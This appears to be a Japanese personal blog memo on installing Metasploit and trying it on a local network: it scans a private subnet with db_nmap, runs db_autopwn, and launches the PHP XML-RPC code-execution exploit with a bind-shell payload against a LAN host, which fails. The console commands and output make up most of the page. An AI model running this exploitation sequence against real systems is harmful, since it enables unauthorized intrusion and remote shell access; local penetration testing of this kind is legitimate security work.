Metasploitで脆弱性診断

サーバー運用がかなり厳しいので寄付をしてくれる人がいたらこちら
メインPCもボロボロになってきたので、ついにほしいものリスト公開

ということで、久しぶりに新規ページですよ

注意

本ページで書いている覚書はローカルネットワーク内での実施を前提に書いています。
外部(他人)のサーバへこれを行うと、最悪訴えられる場合もあります。

Nessusよりも危険度が高そうな脆弱性診断をやってみますよ。

HP: http://www.metasploit.com/

設置

# cd /usr/local/src/
# svn co https://www.metasploit.com/svn/framework3/trunk msf3
# cp -r msf3 /usr/local/msf3
# cd /usr/local/msf3
# mysqladmin -uroot -p create msf3
# mysql -u root -p
mysql> grant all privileges on msf3.* to msf3@localhost identified by 'msf3';
mysql> quit

動作確認

# ./msfconsole

                __.                       .__.        .__. __.
  _____   _____/  |______    ____________ |  |   ____ |__|/  |_
 /     \_/ __ \   __\__  \  /  ___/\____ \|  |  /  _ \|  \   __\
|  Y Y  \  ___/|  |  / __ \_\___ \ |  |_> >  |_(  <_> )  ||  |
|__|_|  /\___  >__| (____  /____  >|   __/|____/\____/|__||__|
      \/     \/          \/     \/ |__|


       =[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ -- --=[ 703 exploits - 405 auxiliary - 39 post
+ -- --=[ 288 payloads - 27 encoders - 8 nops
       =[ svn r12763 updated today (2011.05.29)

msf > db_driver mysql
[*] Using database driver mysql
msf > db_connect msf3:msf3@localhost/msf3
msf > db_nmap 192.168.x.*
[*] Nmap: Starting Nmap 5.50 ( http://nmap.org ) at 2011-05-30 20:01 JST
~~中略~~
[*] Nmap: Nmap done: 256 IP addresses (8 hosts up) scanned in 7.34 seconds
msf > db_autopwn -t
[*] Analysis completed in 11 seconds (0 vulns / 0 refs)
~~~

いちおうこれでいいらしい?とおもったら実は違うらしい?
xxxxxを検索して出てきたやつを設定してホストを設定して
exploitを実行らしいですよ

msf > search drupal

Matching Modules
================
   Name                                 Disclosure Date  Rank       Description
   ----                                 ---------------  ----       -----------
   exploit/unix/webapp/php_xmlrpc_eval  2005-06-29       excellent  PHP XML-RPC Arbitrary Code Execution

msf > use exploit/unix/webapp/php_xmlrpc_eval
msf exploit(php_xmlrpc_eval) > show payloads

Compatible Payloads
=================== 
  Name                           Disclosure Date  Rank    Description
   ----                           ---------------  ----    -----------
   generic/debug_trap                              normal  Generic x86 Debug Trap
   generic/shell_bind_tcp                          normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                       normal  Generic Command Shell, Reverse TCP Inline
   generic/tight_loop                              normal  Generic x86 Tight Loop
   solaris/x86/shell_bind_tcp                      normal  Solaris Command Shell, Bind TCP Inline
   solaris/x86/shell_reverse_tcp                   normal  Solaris Command Shell, Reverse TCP Inline

msf exploit(php_xmlrpc_eval) > show options
Module options (exploit/unix/webapp/php_xmlrpc_eval):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   PATH     /xmlrpc.php      yes       Path to xmlrpc.php
   Proxies                   no        Use a proxy chain
   RHOST                     yes       The target address
   RPORT    80               yes       The target port
   VHOST                     no        HTTP server virtual host

Exploit target:
   Id  Name
   --  ----
   0   Automatic

msf exploit(php_xmlrpc_eval) >  set payload generic/shell_bind_tcp
payload => generic/shell_bind_tcp
msf exploit(php_xmlrpc_eval) > set RHOST 192.168.xx.xx
RHOST => 192.168.xx.xx
msf exploit(php_xmlrpc_eval) > exploit

[*] Started bind handler
[-] exploit failed: no response
[*] Exploit completed, but no session was created.

アクセスログにはこんな感じで乗ってきます。

192.168.xx.yy - - [30/May/2011:20:10:25 +0900] "POST /xmlrpc.php HTTP/1.1" 200 455 "-" "-"

今回は no session was created. でアクセスしたけどダメだった系なメッセージですね。
うまくいくとシェルがたたけたりするらしいですよ。

コメントを追加

Plain text

  • HTMLタグは利用できません。
  • ウェブページアドレスとメールアドレスは、自動的にハイパーリンクに変換されます。
  • 行と段落は自動的に折り返されます。
CAPTCHA
また変更しました
Fill in the blank.